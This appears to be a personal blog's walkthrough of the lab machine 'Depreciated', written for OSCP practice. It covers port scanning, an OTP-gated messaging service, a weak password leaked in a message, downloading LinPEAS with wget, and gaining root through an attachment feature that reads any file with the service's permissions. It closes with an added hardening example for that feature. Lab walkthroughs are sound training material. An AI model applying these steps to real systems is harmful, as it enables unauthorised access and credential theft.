Proving Grounds: Depreciated

Al1z4deh:~# echo "Welcome"
Dec 15, 2022

Today we will take a look at Proving Grounds: Depreciated. My purpose in sharing this post is to prepare for the OSCP exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
└─# nmap -Pn -p- -sS --min-rate 10000 -oN nmap/quick 192.168.168.170
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 14:00 EST
Nmap scan report for 192.168.168.170
Host is up (0.15s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5132/tcp open unknown
8433/tcp open unknown
  • Web (80)

When we look at the source code, we see that there is a GraphQL implementation on port 8433.

  • GraphQL

To list users

  • SSH (Peter)

In order to connect to port 5132, an OTP code is additionally required.

└─# nc -nv 192.168.168.170 5132
(UNKNOWN) [192.168.168.170] 5132 (?) open
Enter Username: peter
Enter OTP:

Now we have an OTP code.

Let’s connect to the port.

└─# nc -nv 192.168.168.170 5132
(UNKNOWN) [192.168.168.170] 5132 (?) open
Enter Username: peter
Enter OTP: ysvdzoSdDjcY1gYo
$ help

list list messages
create create new message
exit exit the messaging system
read read the message with given id
update update the message with given id
help Show this help

$ list
#2345 Improve the ticketing CLI syst
#1893 Staging keeps on crashing beca
#2347 [critical] The ticketing websi
#1277 Update the MySQL version, it's
#234 Hey, Please change your passwo
#0 Hey, Seriously this is getting

$ read 234
Message No: #234

Hey, Please change your password ASAP. You know the password policy, using weak password isn't allowed. And peter@safe is very weak, use https://password.kaspersky.com/ to check the strength of the password.

Attachment: none

After taking the password, we log in with SSH.

  • Privesc
peter@depreciated:~$ wget 192.168.49.168/linpeas.sh

peter@depreciated:~$ bash linpeas.sh

I started LinPEAS and found some interesting files in the folder.

peter@depreciated:/opt/depreciated/messaging$ cat messages.py

This lets you add an attachment file from the system to your message and write program add-ons.

import json
import os
import random

# MESSAGES is the module-level message list defined elsewhere in messages.py (not shown in this excerpt)

def create_message(user):
    for_ = input("for: ")
    description = input("Description: ")
    num = random.randint(1000, 9999)
    author = user
    attachment = input("File: ")

    # Any existing path is accepted and read with the service's own permissions
    if attachment and attachment != "none" and os.path.exists(attachment):
        with open(attachment, 'r') as f:
            data = f.read()
        # The copy is written to /opt/depreciated/<file name>
        basename = '/opt/depreciated/' + os.path.basename(attachment)

        with open(basename, 'w') as f:
            f.write(data)
    else:
        attachment = "none"
    msg_info = {'id': num, 'author': author, 'description': description, 'for': for_, 'attachment': attachment}
    MESSAGES.append(msg_info)

    with open("/opt/depreciated/messaging/msg.json", 'w') as f:
        json.dump(MESSAGES, f)

I wanted to check out a file that I don’t have permission to.

└─# nc -nv 192.168.168.170 5132                        
(UNKNOWN) [192.168.168.170] 5132 (?) open
Enter Username: peter
Enter OTP: kZNr4NDL4BgvnZfu
$ create
for: peter
Description: test
File: /opt/depreciated/messaging/msg.json

There is a password in the text here; I understand that it is the root password.

peter@depreciated:/opt/depreciated$ su root
Password:
root@depreciated:/opt/depreciated# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
root@depreciated:/opt/depreciated#

And now we are root.
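
On the defensive side, create_message reads whatever path the user types with the service's own permissions and writes a copy under /opt/depreciated/. Here is one way to harden that attachment copy, as an added example that is not part of the original post or the box's code. The names safe_attach, upload_dir, store_dir and the size limit are assumptions, and the demo files are constructed.

```python
import os
import shutil
import stat
import tempfile

class AttachmentRejected(Exception):
    """The requested attachment path failed validation."""

def safe_attach(path, upload_dir, store_dir, max_bytes=1_000_000):
    """Copy path into store_dir only if it resolves inside upload_dir."""
    root = os.path.realpath(upload_dir)
    real = os.path.realpath(path)  # collapses ../ and resolves symlinks
    if real == root or os.path.commonpath([root, real]) != root:
        raise AttachmentRejected("path is outside the upload directory")
    try:  # O_NOFOLLOW refuses a symlink swapped in after the check above
        fd_in = os.open(real, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK)
    except OSError as exc:
        raise AttachmentRejected(f"cannot open attachment: {exc.strerror}")
    try:
        info = os.fstat(fd_in)
        if not stat.S_ISREG(info.st_mode) or info.st_size > max_bytes:
            raise AttachmentRejected("not a regular file or too large")
        dest = os.path.join(store_dir, os.path.basename(real))
        # O_EXCL never overwrites an existing file; 0o600 keeps the copy owner-only
        fd_out = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd_out, "wb") as out, open(fd_in, "rb", closefd=False) as src:
            shutil.copyfileobj(src, out)
    finally:
        os.close(fd_in)
    return dest

def demo():  # constructed files in a temporary directory; returns label -> outcome
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        uploads, store, secret = (os.path.join(tmp, n) for n in ("uploads", "store", "msg.json"))
        os.mkdir(uploads)
        os.mkdir(store)
        note = os.path.join(uploads, "note.txt")
        for name, text in ((secret, "constructed secret"), (note, "hello")):
            with open(name, "w") as f:
                f.write(text)
        os.symlink(secret, os.path.join(uploads, "link"))
        cases = {"ok": note, "absolute": secret, "symlink": os.path.join(uploads, "link"),
                 "traversal": os.path.join(uploads, "..", "msg.json")}
        for label, candidate in cases.items():
            try:
                results[label] = os.path.basename(safe_attach(candidate, uploads, store))
            except AttachmentRejected:
                results[label] = "rejected"
    return results
```

The path check only limits which files can be attached. Running the messaging service as an unprivileged account is what stops it from reading files its users cannot.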

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
